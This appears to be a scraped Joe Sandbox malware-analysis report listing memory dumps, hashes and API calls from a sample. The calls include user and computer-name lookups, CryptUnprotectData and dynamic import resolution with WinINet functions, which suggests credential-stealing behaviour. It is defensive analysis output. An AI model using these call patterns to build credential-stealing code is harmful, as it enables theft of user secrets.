Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: aaa5aedc5842f0fdb42e56408516b107f3dd32c7ae476ecd6790228d2d225fca
Instruction ID: f630c737be376b880fb2fd5ba366b9fcd3bb033c809a9d865f18fe38c5ca9386
Opcode Fuzzy Hash: aaa5aedc5842f0fdb42e56408516b107f3dd32c7ae476ecd6790228d2d225fca
Instruction Fuzzy Hash: 0311BAB4A00209DFDB04DFA4D985AAEB7B9FF88300F104559E91597390D774AE10CF62

Function 00AC78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AC7910
RtlAllocateHeap.NTDLL(00000000), ref: 00AC7917
GetComputerNameA.KERNEL32(?,00000104), ref: 00AC792F

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: b83e1b308431e5c63cdf2751aa3ba1f58c668c54c980513805402012f6ba7c5f
Instruction ID: b34b477abd612b8735cb013a06e6416bb173646057b39e98d901cee725a714e6
Opcode Fuzzy Hash: b83e1b308431e5c63cdf2751aa3ba1f58c668c54c980513805402012f6ba7c5f
Instruction Fuzzy Hash: 16016DB1A04208EFC740DF98DD45FAEFBB8FB04B65F10422AEA55A3280C77459008BA2

Function 00AC7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00AB11B7), ref: 00AC7880
RtlAllocateHeap.NTDLL(00000000), ref: 00AC7887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 00AC789F

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: 6566db397dce0c395776514636d684e08415b75783bfe59e96a2328476ca3c9b
Instruction ID: 2ce2acaf77f25a1f9d0af99d726fc15edbd975609fb69a70f42f659ad789a226
Opcode Fuzzy Hash: 6566db397dce0c395776514636d684e08415b75783bfe59e96a2328476ca3c9b
Instruction Fuzzy Hash: 8BF04FF2944208AFC700DF99DD49FAEFBB8FB04761F10065AFA05A3680C7B41904CBA2

Function 00AB1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 00AB116A
ExitProcess.KERNEL32 ref: 00AB117E

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: cb82370d8e734d3ebe63a5bf6f16b6b3f36927e77754672eb5bff571abbb5790
Instruction ID: 6c5b48f7d02fe8d7b8eb9be20293bd5ff44eabc49cd41d14784708bb0db81e46
Opcode Fuzzy Hash: cb82370d8e734d3ebe63a5bf6f16b6b3f36927e77754672eb5bff571abbb5790
Instruction Fuzzy Hash: 50D05EB490030CDBCB00EFE0D849BEDFB78FB0C311F000659D90972340EA306481CAA6

Function 00AC9C10 Relevance: 236.9, APIs: 112, Strings: 23, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(76210000,005D6800), ref: 00AC9C2D
GetProcAddress.KERNEL32(76210000,005D67C0), ref: 00AC9C45
GetProcAddress.KERNEL32(76210000,005E9008), ref: 00AC9C5E
GetProcAddress.KERNEL32(76210000,005E9068), ref: 00AC9C76
GetProcAddress.KERNEL32(76210000,005E9098), ref: 00AC9C8E
GetProcAddress.KERNEL32(76210000,005ED938), ref: 00AC9CA7
GetProcAddress.KERNEL32(76210000,005DA910), ref: 00AC9CBF
GetProcAddress.KERNEL32(76210000,005ED998), ref: 00AC9CD7
GetProcAddress.KERNEL32(76210000,005ED9F8), ref: 00AC9CF0
GetProcAddress.KERNEL32(76210000,005ED9C8), ref: 00AC9D08
GetProcAddress.KERNEL32(76210000,005EDAE8), ref: 00AC9D20
GetProcAddress.KERNEL32(76210000,005D69C0), ref: 00AC9D39
GetProcAddress.KERNEL32(76210000,005D68A0), ref: 00AC9D51
GetProcAddress.KERNEL32(76210000,005D6820), ref: 00AC9D69
GetProcAddress.KERNEL32(76210000,005D6840), ref: 00AC9D82
GetProcAddress.KERNEL32(76210000,005EDAD0), ref: 00AC9D9A
GetProcAddress.KERNEL32(76210000,005ED9B0), ref: 00AC9DB2
GetProcAddress.KERNEL32(76210000,005DA848), ref: 00AC9DCB
GetProcAddress.KERNEL32(76210000,005D6740), ref: 00AC9DE3
GetProcAddress.KERNEL32(76210000,005ED890), ref: 00AC9DFB
GetProcAddress.KERNEL32(76210000,005ED878), ref: 00AC9E14
GetProcAddress.KERNEL32(76210000,005EDA10), ref: 00AC9E2C
GetProcAddress.KERNEL32(76210000,005ED980), ref: 00AC9E44
GetProcAddress.KERNEL32(76210000,005D6880), ref: 00AC9E5D
GetProcAddress.KERNEL32(76210000,005ED8A8), ref: 00AC9E75
GetProcAddress.KERNEL32(76210000,005ED8F0), ref: 00AC9E8D
GetProcAddress.KERNEL32(76210000,005ED8C0), ref: 00AC9EA6
GetProcAddress.KERNEL32(76210000,005ED908), ref: 00AC9EBE
GetProcAddress.KERNEL32(76210000,005ED800), ref: 00AC9ED6
GetProcAddress.KERNEL32(76210000,005EDAB8), ref: 00AC9EEF
GetProcAddress.KERNEL32(76210000,005ED9E0), ref: 00AC9F07
GetProcAddress.KERNEL32(76210000,005ED8D8), ref: 00AC9F1F
GetProcAddress.KERNEL32(76210000,005ED860), ref: 00AC9F38
GetProcAddress.KERNEL32(76210000,005DFEA8), ref: 00AC9F50
GetProcAddress.KERNEL32(76210000,005ED818), ref: 00AC9F68
GetProcAddress.KERNEL32(76210000,005ED920), ref: 00AC9F81
GetProcAddress.KERNEL32(76210000,005D6920), ref: 00AC9F99
GetProcAddress.KERNEL32(76210000,005EDA40), ref: 00AC9FB1
GetProcAddress.KERNEL32(76210000,005D69E0), ref: 00AC9FCA
GetProcAddress.KERNEL32(76210000,005EDA58), ref: 00AC9FE2
GetProcAddress.KERNEL32(76210000,005ED950), ref: 00AC9FFA
GetProcAddress.KERNEL32(76210000,005D6A20), ref: 00ACA013
GetProcAddress.KERNEL32(76210000,005D6A40), ref: 00ACA02B
LoadLibraryA.KERNEL32(005EDA28,?,00AC5CA3,00AD0AEB,?,?,?,?,?,?,?,?,?,?,00AD0AEA,00AD0AE3), ref: 00ACA03D
LoadLibraryA.KERNEL32(005ED968,?,00AC5CA3,00AD0AEB,?,?,?,?,?,?,?,?,?,?,00AD0AEA,00AD0AE3), ref: 00ACA04E
LoadLibraryA.KERNEL32(005EDA70,?,00AC5CA3,00AD0AEB,?,?,?,?,?,?,?,?,?,?,00AD0AEA,00AD0AE3), ref: 00ACA060
LoadLibraryA.KERNEL32(005ED830,?,00AC5CA3,00AD0AEB,?,?,?,?,?,?,?,?,?,?,00AD0AEA,00AD0AE3), ref: 00ACA072
LoadLibraryA.KERNEL32(005EDA88,?,00AC5CA3,00AD0AEB,?,?,?,?,?,?,?,?,?,?,00AD0AEA,00AD0AE3), ref: 00ACA083
LoadLibraryA.KERNEL32(005EDAA0,?,00AC5CA3,00AD0AEB,?,?,?,?,?,?,?,?,?,?,00AD0AEA,00AD0AE3), ref: 00ACA095
LoadLibraryA.KERNEL32(005ED848,?,00AC5CA3,00AD0AEB,?,?,?,?,?,?,?,?,?,?,00AD0AEA,00AD0AE3), ref: 00ACA0A7
LoadLibraryA.KERNEL32(005EDD28,?,00AC5CA3,00AD0AEB,?,?,?,?,?,?,?,?,?,?,00AD0AEA,00AD0AE3), ref: 00ACA0B8
GetProcAddress.KERNEL32(751E0000,005D6520), ref: 00ACA0DA
GetProcAddress.KERNEL32(751E0000,005EDB18), ref: 00ACA0F2
GetProcAddress.KERNEL32(751E0000,005E89F8), ref: 00ACA10A
GetProcAddress.KERNEL32(751E0000,005EDB48), ref: 00ACA123
GetProcAddress.KERNEL32(751E0000,005D6440), ref: 00ACA13B
GetProcAddress.KERNEL32(70150000,005DA898), ref: 00ACA160
GetProcAddress.KERNEL32(70150000,005D65E0), ref: 00ACA179
GetProcAddress.KERNEL32(70150000,005DA4B0), ref: 00ACA191
GetProcAddress.KERNEL32(70150000,005EDB78), ref: 00ACA1A9
GetProcAddress.KERNEL32(70150000,005EDCF8), ref: 00ACA1C2
GetProcAddress.KERNEL32(70150000,005D6360), ref: 00ACA1DA
GetProcAddress.KERNEL32(70150000,005D66C0), ref: 00ACA1F2
GetProcAddress.KERNEL32(70150000,005EDDD0), ref: 00ACA20B
GetProcAddress.KERNEL32(753A0000,005D66A0), ref: 00ACA22C
GetProcAddress.KERNEL32(753A0000,005D6460), ref: 00ACA244
GetProcAddress.KERNEL32(753A0000,005EDCB0), ref: 00ACA25D
GetProcAddress.KERNEL32(753A0000,005EDB60), ref: 00ACA275
GetProcAddress.KERNEL32(753A0000,005D6580), ref: 00ACA28D
GetProcAddress.KERNEL32(76310000,005DA8C0), ref: 00ACA2B3
GetProcAddress.KERNEL32(76310000,005DA5A0), ref: 00ACA2CB
GetProcAddress.KERNEL32(76310000,005EDB00), ref: 00ACA2E3
GetProcAddress.KERNEL32(76310000,005D6600), ref: 00ACA2FC
GetProcAddress.KERNEL32(76310000,005D6560), ref: 00ACA314
GetProcAddress.KERNEL32(76310000,005DA4D8), ref: 00ACA32C
GetProcAddress.KERNEL32(76910000,005EDBC0), ref: 00ACA352
GetProcAddress.KERNEL32(76910000,005D6400), ref: 00ACA36A
GetProcAddress.KERNEL32(76910000,005E8978), ref: 00ACA382
GetProcAddress.KERNEL32(76910000,005EDD10), ref: 00ACA39B
GetProcAddress.KERNEL32(76910000,005EDCE0), ref: 00ACA3B3
GetProcAddress.KERNEL32(76910000,005D64C0), ref: 00ACA3CB
GetProcAddress.KERNEL32(76910000,005D64A0), ref: 00ACA3E4
GetProcAddress.KERNEL32(76910000,005EDB30), ref: 00ACA3FC
GetProcAddress.KERNEL32(76910000,005EDBD8), ref: 00ACA414
GetProcAddress.KERNEL32(75B30000,005D6480), ref: 00ACA436
GetProcAddress.KERNEL32(75B30000,005EDD88), ref: 00ACA44E
GetProcAddress.KERNEL32(75B30000,005EDD40), ref: 00ACA466
GetProcAddress.KERNEL32(75B30000,005EDD58), ref: 00ACA47F
GetProcAddress.KERNEL32(75B30000,005EDD70), ref: 00ACA497
GetProcAddress.KERNEL32(75670000,005D63C0), ref: 00ACA4B8
GetProcAddress.KERNEL32(75670000,005D6500), ref: 00ACA4D1
GetProcAddress.KERNEL32(76AC0000,005D64E0), ref: 00ACA4F2
GetProcAddress.KERNEL32(76AC0000,005EDB90), ref: 00ACA50A
GetProcAddress.KERNEL32(6F4E0000,005D6540), ref: 00ACA530
GetProcAddress.KERNEL32(6F4E0000,005D62E0), ref: 00ACA548
GetProcAddress.KERNEL32(6F4E0000,005D65A0), ref: 00ACA560
GetProcAddress.KERNEL32(6F4E0000,005EDBF0), ref: 00ACA579
GetProcAddress.KERNEL32(6F4E0000,005D6640), ref: 00ACA591
GetProcAddress.KERNEL32(6F4E0000,005D6300), ref: 00ACA5A9
GetProcAddress.KERNEL32(6F4E0000,005D6620), ref: 00ACA5C2
GetProcAddress.KERNEL32(6F4E0000,005D6420), ref: 00ACA5DA
GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 00ACA5F1
GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 00ACA607
GetProcAddress.KERNEL32(75AE0000,005EDDA0), ref: 00ACA629
GetProcAddress.KERNEL32(75AE0000,005E89B8), ref: 00ACA641
GetProcAddress.KERNEL32(75AE0000,005EDDB8), ref: 00ACA659
GetProcAddress.KERNEL32(75AE0000,005EDBA8), ref: 00ACA672
GetProcAddress.KERNEL32(76300000,005D63E0), ref: 00ACA693
GetProcAddress.KERNEL32(6FE30000,005EDC08), ref: 00ACA6B4
GetProcAddress.KERNEL32(6FE30000,005D6320), ref: 00ACA6CD
GetProcAddress.KERNEL32(6FE30000,005EDC20), ref: 00ACA6E5
GetProcAddress.KERNEL32(6FE30000,005EDC38), ref: 00ACA6FD

Strings

@d], xrefs: 00ACA12E
e], xrefs: 00ACA16B
HttpQueryInfoA, xrefs: 00ACA5FC
c], xrefs: 00ACA6BF
`e], xrefs: 00ACA307
c], xrefs: 00ACA686
b], xrefs: 00ACA53B
i], xrefs: 00AC9F8C
j], xrefs: 00ACA005
`c], xrefs: 00ACA1CD
e], xrefs: 00ACA0CC
h], xrefs: 00AC9D5C
@g], xrefs: 00AC9DD6
@f], xrefs: 00ACA584
InternetSetOptionA, xrefs: 00ACA5E5
i], xrefs: 00AC9FBC
d], xrefs: 00ACA5CD
@j], xrefs: 00ACA01E
d], xrefs: 00ACA4E5
@h], xrefs: 00AC9D74
f], xrefs: 00ACA5B4
@e], xrefs: 00ACA522
`d], xrefs: 00ACA237

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: c]$ d]$ e]$ f]$ h]$ i]$ j]$@d]$@e]$@f]$@g]$@h]$@j]$HttpQueryInfoA$InternetSetOptionA$`c]$`d]$`e]$b]$c]$d]$e]$i]
API String ID: 2238633743-3078484636
Opcode ID: 244ed7553d19e72494e2ac87293db6541e612bcad3ee91d1ef92b664d0df06ab
Instruction ID: a0d00667274c99f122aecb89313dbe06722801948f3d4fa8803ea042e97b40c3
Opcode Fuzzy Hash: 244ed7553d19e72494e2ac87293db6541e612bcad3ee91d1ef92b664d0df06ab
Instruction Fuzzy Hash: E06218F5600201AFC348EFA9ED88FBEBBF9F74C241714951AA60DC3264D679A841DB53

Function 00AB7710 Relevance: 96.8, APIs: 54, Strings: 1, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00AB7724
RtlAllocateHeap.NTDLL(00000000), ref: 00AB772B
lstrcat.KERNEL32(?,005EA838), ref: 00AB78DB
lstrcat.KERNEL32(?,?), ref: 00AB78EF
lstrcat.KERNEL32(?,?), ref: 00AB7903
lstrcat.KERNEL32(?,?), ref: 00AB7917
lstrcat.KERNEL32(?,005EF7C8), ref: 00AB792B
lstrcat.KERNEL32(?,005EF618), ref: 00AB793F
lstrcat.KERNEL32(?,005EF6A8), ref: 00AB7952
lstrcat.KERNEL32(?,005EF648), ref: 00AB7966
lstrcat.KERNEL32(?,005EA8C0), ref: 00AB797A
lstrcat.KERNEL32(?,?), ref: 00AB798E
lstrcat.KERNEL32(?,?), ref: 00AB79A2
lstrcat.KERNEL32(?,?), ref: 00AB79B6
lstrcat.KERNEL32(?,005EF7C8), ref: 00AB79C9
lstrcat.KERNEL32(?,005EF618), ref: 00AB79DD
lstrcat.KERNEL32(?,005EF6A8), ref: 00AB79F1
lstrcat.KERNEL32(?,005EF648), ref: 00AB7A04
lstrcat.KERNEL32(?,005EF7F0), ref: 00AB7A18
lstrcat.KERNEL32(?,?), ref: 00AB7A2C
lstrcat.KERNEL32(?,?), ref: 00AB7A40
lstrcat.KERNEL32(?,?), ref: 00AB7A54
lstrcat.KERNEL32(?,005EF7C8), ref: 00AB7A68
lstrcat.KERNEL32(?,005EF618), ref: 00AB7A7B
lstrcat.KERNEL32(?,005EF6A8), ref: 00AB7A8F
lstrcat.KERNEL32(?,005EF648), ref: 00AB7AA3
lstrcat.KERNEL32(?,005EF858), ref: 00AB7AB6
lstrcat.KERNEL32(?,?), ref: 00AB7ACA
lstrcat.KERNEL32(?,?), ref: 00AB7ADE
lstrcat.KERNEL32(?,?), ref: 00AB7AF2
lstrcat.KERNEL32(?,005EF7C8), ref: 00AB7B06
lstrcat.KERNEL32(?,005EF618), ref: 00AB7B1A
lstrcat.KERNEL32(?,005EF6A8), ref: 00AB7B2D
lstrcat.KERNEL32(?,005EF648), ref: 00AB7B41
lstrcat.KERNEL32(?,005EF8C0), ref: 00AB7B55
lstrcat.KERNEL32(?,?), ref: 00AB7B69
lstrcat.KERNEL32(?,?), ref: 00AB7B7D
lstrcat.KERNEL32(?,?), ref: 00AB7B91
lstrcat.KERNEL32(?,005EF7C8), ref: 00AB7BA4
lstrcat.KERNEL32(?,005EF618), ref: 00AB7BB8
lstrcat.KERNEL32(?,005EF6A8), ref: 00AB7BCC
lstrcat.KERNEL32(?,005EF648), ref: 00AB7BDF
lstrcat.KERNEL32(?,005EF928), ref: 00AB7BF3
lstrcat.KERNEL32(?,?), ref: 00AB7C07
lstrcat.KERNEL32(?,?), ref: 00AB7C1B
lstrcat.KERNEL32(?,?), ref: 00AB7C2F
lstrcat.KERNEL32(?,005EF7C8), ref: 00AB7C43
lstrcat.KERNEL32(?,005EF618), ref: 00AB7C56
lstrcat.KERNEL32(?,005EF6A8), ref: 00AB7C6A
